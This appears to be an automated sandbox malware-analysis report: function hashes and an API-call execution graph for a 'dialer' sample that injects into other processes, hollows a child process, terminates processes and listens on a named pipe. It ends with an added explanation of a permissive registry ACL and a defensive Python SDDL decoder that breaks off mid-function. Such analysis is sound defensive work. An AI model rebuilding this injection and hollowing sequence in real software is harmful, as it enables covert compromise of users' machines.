                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: a7ea18857f0c2aaebc1769a352cc7adad51a7e1654ed8dc536a7df88c33d9cd7
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 9711A733651E1B31FA549728EC4D37931C16B5C3F6F486638A966062D6CA3CCB4D4338
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 06d06f76227022a9f5d1212550cd0901f3909c4b44ef6588e9c3e8ff2161f59b
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: EE112B32A50E4811F66A9118EC1D3658950EB78BF6F0A3A34A53607ED6C63EC740633C
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: bde2a73a6c5fdac79e55196d6dd89301c99b45748ce3786731260929158328df
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: F4619D72700E4882FA69DB64ED4C32A2BA1A7857C2F517525CA4A077B5DB3CCA438738
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 7121fcdbde6feb512a79f64f3a4f84ebfa020095b1d877e238ca44cd6c43436a
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 6F615933600F888AEB24DF65D84439DB7A0F348BC9F046225EF4917B98DB38D695CB24
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: d29e46e796442fbccaa45ff0a69f107d8e9040b97be0a3088541bfeca930ac41
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: CB518332200B88CAEB74CF25984835877A0F355BC6F186125DA5947BE5CB3ED662CB38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: b2573f3a0e28ec7478961297ebaffcae1255a42cea17601f1662b17ba3d280ba
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 56518F72100A888AEF64CF269988359B7A0F355BCAF146126DB5A47BD5CB3CD650CF38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: d38a37f33ebef9b0ae7e466fc22341eb2192eec7cd92f292bae3f12aaefec7e9
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: D451C432702A088BEB14CF15D848B1937A5F354BEDF94A129DA1643798EB7CDE42C738
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: aed1aa7a57b0562c17815b3342e8100724a32f9ff8f88b3be7356df183102d8f
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: CE318D72302A4896E714DF11EC4871977A4F344BDAF959018EE5B077A9DB3CDA42C738
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: 715c1de296ad208afb584ecc119e70067c5410cf6b00ecc694a14cda3edd43db
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 48D13272714E8889E711CFB9D8443ACBBB1F344BD9F109216CE5D97B9ADA39C206C364
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 511a5390475af39f0f30f5d2462ff531daa65af7d341b937ecda168f05fedca0
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: 51015A36600F98C6E704DF66ED0814ABBA0F78DFC2F059425EA5A43729DE38D251C764
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 642866cb780f391581793c658500856a692f819b9db5c5c0d868ab1e09f5b0b1
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: F191B572700E5895F764DFA588483BDABA0F704FDAF146105DE0E57A85DB3AC682C738
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 15a2a209157c5afce9d35a6a055bd2969ca5ec2551eb7b70c7ff8f74499d5dc7
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: F171F336200F8981EF64DE659C483BAA7A4F385BC6F442126DD0963B99DE39C745CB38
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: b267ec207ab3027cc4c7daeae69c6efacf6b756833aecf8a5b9a9590cd618f48
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: A5615832B00F888AEB20DF65D84439D77A0F354BC9F046215EF8917BA8DB38D696C724
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: 7823b1c60e900401edacb558897a0f90a3d51504748f56fa69511ae593b01ec0
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: 7451F332604B8981EE74CA69A85C3BAE791F3857C1F842125DD5903B5ADA3DCB048FB8
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: b0f100d0c7057803a38617d554a2cf33ee99a3079565cd0482915e063c1748fe
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 9141C472314F8482EB20DF65E8483A9B7A0F798BD5F545022EE4D87798EB3DC641CB64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 0dd9abf7dea3feeb9c8a6e8342b82b7a28e66383d326496ca4d594d0f33923bf
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 82115832204F8482EB21CF15E80835AB7E4FB88B95F199220EE8C07B68DF3DC651CB14
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: 3718b566d7a0f2adc669c698051cc10a99aae6c4637dbe4262becdd4256b497d
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: BAE08671641F4890EF01CF21EC4429873A0DB58BA4B88A122995C46351FA3CD2E9C320
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 388f0cfffdf7646ae4befc00da2f137d9e7739ca14c356c8d83072b8bc327059
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: E2E08671641F4880EF01CF21D84419873A0E758B94B88A122C94C46311EA3CE2E5C320
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 56ee2fff3bbd0e13e7513dd09ffed2945b9ed838cddbd72046c6ded088ba7054
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: 6A119E39601F4881EE04DB66AC0C269B7A1FB89FC2F19A028DE4D53766DF3DD542C724
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: ccb56dfa411da463c8507d741658e5bace5dd002053283e2c16c8f8ee8116812
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: 27E06D39601E0886EB04CF62DC0C34ABAE1FB89F86F06D024C90907351DF7E8599C770

                        Execution Graph

                        Execution Coverage:48.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:38.1%
                        Total number of Nodes:226
                        Total number of Limit Nodes:22
execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                        Callgraph

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                        • API String ID: 4177739653-1130149537
                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
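The string D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) listed for this function is an SDDL security descriptor, and the execution graph shows ConvertStringSecurityDescriptorToSecurityDescriptorW feeding RegSetKeySecurity right after RegCreateKeyExW, so it is most plausibly applied to the SOFTWARE\dialerconfig key that the same function names (an inference from the call order, not a statement of the report). Decoded, both ACEs are access-allowed entries with OI and CI (inherited by sub-keys and values) granting GA (GENERIC_ALL) to Authenticated Users (AU) and to Builtin Administrators (BA); the first entry means any logged-on user can rewrite the configuration. The Python below is an added example, not part of the report or of the sample: it decodes the DACL section of an SDDL string and flags allow-ACEs that give a write-capable right to a broad group. The alias tables are a subset of the documented SDDL codes, and hex rights masks are passed through undecoded.

```python
"""Decode the DACL of an SDDL security descriptor string and flag ACEs that give
write-level rights to a broad principal (added example, not report output)."""
import re

# Subsets of the documented SDDL two-letter codes; unknown codes pass through.
SID_ALIASES = {"AU": "Authenticated Users", "BA": "Builtin Administrators",
               "BU": "Builtin Users", "WD": "Everyone", "IU": "Interactive Users",
               "SY": "Local System", "CO": "Creator Owner"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
          "GX": "GENERIC_EXECUTE", "FA": "FILE_ALL_ACCESS", "KA": "KEY_ALL_ACCESS",
          "KR": "KEY_READ", "KW": "KEY_WRITE"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "IO": "INHERIT_ONLY",
             "NP": "NO_PROPAGATE_INHERIT", "ID": "INHERITED"}
BROAD = {"AU", "BU", "WD", "IU"}            # every ordinary local user is a member
WRITE_LIKE = {"GA", "GW", "FA", "KA", "KW"}  # rights that allow modification


def sddl_sections(sddl):
    """Split 'O:...G:...D:...S:...' into {'O': ..., 'G': ..., 'D': ..., 'S': ...}."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"([OGDS]):(.*?)(?=[OGDS]:|$)", sddl)}


def pairs(codes):
    """SDDL writes flag and right codes as concatenated two-letter pairs."""
    return [codes[i:i + 2] for i in range(0, len(codes), 2)]


def parse_ace(body):
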